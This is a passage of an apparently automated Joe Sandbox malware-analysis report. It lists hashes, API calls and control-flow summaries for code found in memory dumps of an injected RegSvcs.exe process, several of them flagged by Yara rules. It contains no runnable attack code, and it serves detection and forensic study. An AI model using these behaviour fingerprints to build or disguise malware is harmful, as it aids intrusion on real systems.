                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
                                          • Instruction ID: 459d15be89f7e1591502f4652df86cbeaa9056de4fe3426ea1bc8d7cb4947672
                                          • Opcode Fuzzy Hash: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
                                          • Instruction Fuzzy Hash: 6E90027530100413D511619945047070049A7E0285F91C422A0414598DD6969D56B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
                                          • Instruction ID: 498d9a456eb62590d77414ec8c2776b830935af46f969968e0934e224456c096
                                          • Opcode Fuzzy Hash: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
                                          • Instruction Fuzzy Hash: EE900265342041539945B19944045074046B7F0285791C022A1404990CC566AC5AE665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
                                          • Instruction ID: ecea57b7b2041fe90a6a566cf0a19ef6b7ccf7ccc7d87518d9c7b06b225cb57a
                                          • Opcode Fuzzy Hash: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
                                          • Instruction Fuzzy Hash: 0F90026570100503D50171994404616004AA7E0285F91C032A1014595ECA659D96B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
                                          • Instruction ID: dcbee2efdbe4dd602c9619e563dc6988026ef4ab370ab7f86a8bb77fb33caacf
                                          • Opcode Fuzzy Hash: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
                                          • Instruction Fuzzy Hash: FD90026570100043854071A988449064045BBF1255751C131A0988590DC5999C6966A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
                                          • Instruction ID: 884874bc3b91629e9553cfa4da00fe35ff54c9024ad536f662d08ab11c33ab0f
                                          • Opcode Fuzzy Hash: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
                                          • Instruction Fuzzy Hash: 3B90027530140403D5006199481470B0045A7E0346F51C021A1154595DC6659C5575B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
                                          • Instruction ID: c37ab6398a5506bdc4b34fe4d0d1ab5b5e2b9b4aab2bb4d5f8c293fd9fd76051
                                          • Opcode Fuzzy Hash: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
                                          • Instruction Fuzzy Hash: BD90026531180043D60065A94C14B070045A7E0347F51C125A0144594CC9559C656565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
                                          • Instruction ID: a4239461e20a19da72ea31f0318d20d6ed9bb526eac1e83ee1c04c83f864334b
                                          • Opcode Fuzzy Hash: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
                                          • Instruction Fuzzy Hash: D2900269311000034505A59907045070086A7E5395351C031F1005590CD6619C656165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
                                          • Instruction ID: e0779b9be53de05bd6c35c83ad60546f8398b95f399db055a3614d1e2fda6482
                                          • Opcode Fuzzy Hash: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
                                          • Instruction Fuzzy Hash: 099002A530200003850571994414616404AA7F0245B51C031E10045D0DC5659C957169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
                                          • Instruction ID: 424b9e2b3a9ed752bc6b804e9645aeb81512f7bc1c7f8df4653a301a6a31ec2d
                                          • Opcode Fuzzy Hash: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
                                          • Instruction Fuzzy Hash: BC90027530100403D50065D954086460045A7F0345F51D021A5014595EC6A59C957175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
                                          • Instruction ID: 3bc11c8ce82b53e441e205f8cf08f4f94dd1fd027005055b63e3cd914bfad2e6
                                          • Opcode Fuzzy Hash: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
                                          • Instruction Fuzzy Hash: 6290026530100003D540719954186064045F7F1345F51D021E0404594CD9559C5A6266
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
                                          • Instruction ID: d7cfaf868bb7511ed8805e251b376f63972e51b787df444d4f4c6afad56bee8e
                                          • Opcode Fuzzy Hash: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
                                          • Instruction Fuzzy Hash: A290026D31300003D5807199540860A0045A7E1246F91D425A0005598CC9559C6D6365
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
                                          • Instruction ID: a8160ebdd8352e378aa54f96549d4aae36abb4591ec7690190b2ada1cb3e86e5
                                          • Opcode Fuzzy Hash: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
                                          • Instruction Fuzzy Hash: 4990027531114403D510619984047060045A7E1245F51C421A0814598DC6D59C957166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
                                          • Instruction ID: e7f0b817cc9a419807fcdf259c4276eb28cea91bc0147c3b84fa26d6de4cf929
                                          • Opcode Fuzzy Hash: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
                                          • Instruction Fuzzy Hash: CF90027530100803D5807199440464A0045A7E1345F91C025A0015694DCA559E5D77E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
                                          • Instruction ID: df69e47551c4cad9191ce19d71fe3eee726331cfac70a0d86c217de13437cc2c
                                          • Opcode Fuzzy Hash: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
                                          • Instruction Fuzzy Hash: 8390027530108803D5106199840474A0045A7E0345F55C421A4414698DC6D59C957165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 34 41e1e9-41e1ed 35 41e17b-41e18b 34->35 36 41e1ef-41e1f3 34->36 40 41e193-41e1a8 RtlAllocateHeap 35->40 41 41e18e call 41eb17 35->41 38 41e1f5-41e21f call 41eb17 ExitProcess 36->38 39 41e254-41e27f 36->39 41->40
                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          • ExitProcess.KERNEL32(?,00000000,000000FC,?,?,00000001), ref: 0041E21F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateExitHeapProcess
                                          • String ID:
                                          • API String ID: 1054155344-0
                                          • Opcode ID: fdcd4ceabbfc5d1b7861bf68a596593ed65f470669e468e0adafd6376cd19152
                                          • Instruction ID: 162caa7d4a894d3a06d7b5dfc8776c07fc6959f4a841d21050d781d56322f286
                                          • Opcode Fuzzy Hash: fdcd4ceabbfc5d1b7861bf68a596593ed65f470669e468e0adafd6376cd19152
                                          • Instruction Fuzzy Hash: C8118BB6204248AFCB14DFA9DC80CEB77ADAF8C354F118249F94D87212C634E952CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 252 408d97-408de1 call 41faf7 call 4205e7 call 40c327 call 418a97 261 408de3-408df5 PostThreadMessageW 252->261 262 408e15-408e19 252->262 263 408e14 261->263 264 408df7-408e11 call 40ba87 261->264 263->262 264->263
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DF1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 1ed508e0c1479fd51ca27d8f4ca93e8f9cc4b3cfe03b86c0649f6ea35fb5846c
                                          • Instruction ID: 58e58f9e7d72cd2cdff23c6cb419043715453cad09f0fd83601a4629f579038d
                                          • Opcode Fuzzy Hash: 1ed508e0c1479fd51ca27d8f4ca93e8f9cc4b3cfe03b86c0649f6ea35fb5846c
                                          • Instruction Fuzzy Hash: C401D831A4022876EB20A6918C43FFE775C9B40B58F04012EFF04FA1C1E6A8690686E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 281 40c327-40c350 call 420837 284 40c352-40c355 281->284 285 40c356-40c364 call 420c57 281->285 288 40c374-40c385 call 41f0b7 285->288 289 40c366-40c371 call 420ed7 285->289 294 40c387-40c39b LdrLoadDll 288->294 295 40c39e-40c3a1 288->295 289->288 294->295
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C399
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction ID: 52dad2fc6da59864e4536e2b798137fde6e463d7ef12a331b6a533209a173677
                                          • Opcode Fuzzy Hash: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction Fuzzy Hash: 840152B5E0010DE7DB10DBA1DC42F9EB7B89F54304F0082A5ED08A7281F635EB48CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 296 41e13e-41e142 297 41e144 296->297 298 41e176 296->298 299 41e189-41e18b 297->299 300 41e146-41e15d 297->300 298->299 301 41e193-41e1a8 RtlAllocateHeap 299->301 302 41e18e call 41eb17 299->302 303 41e163-41e174 300->303 304 41e15e call 41eb17 300->304 302->301 304->303
                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction ID: 8d1316d563e2aaf03bd08c337fc832e1a4a3cebe32cd46d98467985e7523ee24
                                          • Opcode Fuzzy Hash: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction Fuzzy Hash: 4AF0AFB5604204BFDB24DF95EC81DEB7769EF84364F10891AFC0A87742D635E911CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 315 41e308-41e331 call 41eb17 317 41e336-41e34b LookupPrivilegeValueW 315->317
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F399,0040F399,?,00000000,?,?), ref: 0041E347
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction ID: 495473aebacf56c98ac73e8a961da2925d7209559082377b2d4d5fb05a355e1c
                                          • Opcode Fuzzy Hash: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction Fuzzy Hash: BBE0EDB1300204AFC720DF59CC44EE737A9AF88364F1485ADFD08A7241D630E900CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(0041814D,?,004188F4,004188F4,?,0041814D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction ID: 39b5cabef950e6491fd1ff11e6bcb4f47bb735b4b1560f452d24bb2e9d3c42ad
                                          • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction Fuzzy Hash: 83E046B5200218ABDB18EF9ADC45EE737ACEF88764F018159FE095B242C630F910CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction ID: 1d552643a1b6a9e7e8cbaa6fd288b4534f8ea2684dbb839d41cd3eb30db23803
                                          • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction Fuzzy Hash: 83E04FB52002146BD714DF49DC49ED737ACEF88754F014155FD0957241D630F914CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F399,0040F399,?,00000000,?,?), ref: 0041E347
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction ID: fb85849f582dcab3273909ea3b6beb81fed045dfd13ab71d80f81a5ef931559d
                                          • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction Fuzzy Hash: 04E01AB52002186BD710DF49DC45EE737ADAF89664F118159BE0957241D631F8108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 318 40f547-40f56b call 418a97 321 40f56d-40f56e 318->321 322 40f56f-40f580 GetUserGeoID 318->322
                                          APIs
                                          • GetUserGeoID.KERNELBASE(00000010), ref: 0040F571
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: User
                                          • String ID:
                                          • API String ID: 765557111-0
                                          • Opcode ID: c0b073c48b573d6fd42d72d857da5cd3fadecb69c48674ccfcd042dcae8d0138
                                          • Instruction ID: bd466c9d94490778018d0173dd1bcc1bb0bb5a50ad64b5075612b8472f4dc12d
                                          • Opcode Fuzzy Hash: c0b073c48b573d6fd42d72d857da5cd3fadecb69c48674ccfcd042dcae8d0138
                                          • Instruction Fuzzy Hash: ECE02B3378030427F630D5E59C42FB6368E5F84B44F048475F90CEB3C1E5B9E5800024
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction ID: dff9f653467797b72a33652ebf7f400ae81a1b667be369d033710bea9809b9a6
                                          • Opcode Fuzzy Hash: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction Fuzzy Hash: 0AE0D8B81082C64BDB05DF76A9D08973B94EF42314304498AE89547707D134D855CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,000000FC,?,?,00000001), ref: 0041E21F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                          • Instruction ID: 71b31a6e052b90d658ead73e1ea1e15e08fcd2b9b7f1fc59455b7fbc18c8b61a
                                          • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                          • Instruction Fuzzy Hash: 15D0C2313002187BC620DB89CC45FD3379CDF457A4F004065BA0C5B241C530BA00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
                                          • Instruction ID: a4ab471299511e14346808815ac812465a2f38489bf1a4d4109bb17f609530a4
                                          • Opcode Fuzzy Hash: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
                                          • Instruction Fuzzy Hash: FBB09B719064C5C6DA11D7A44608717794477D0759F16C061D1020681B4778D495F6B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
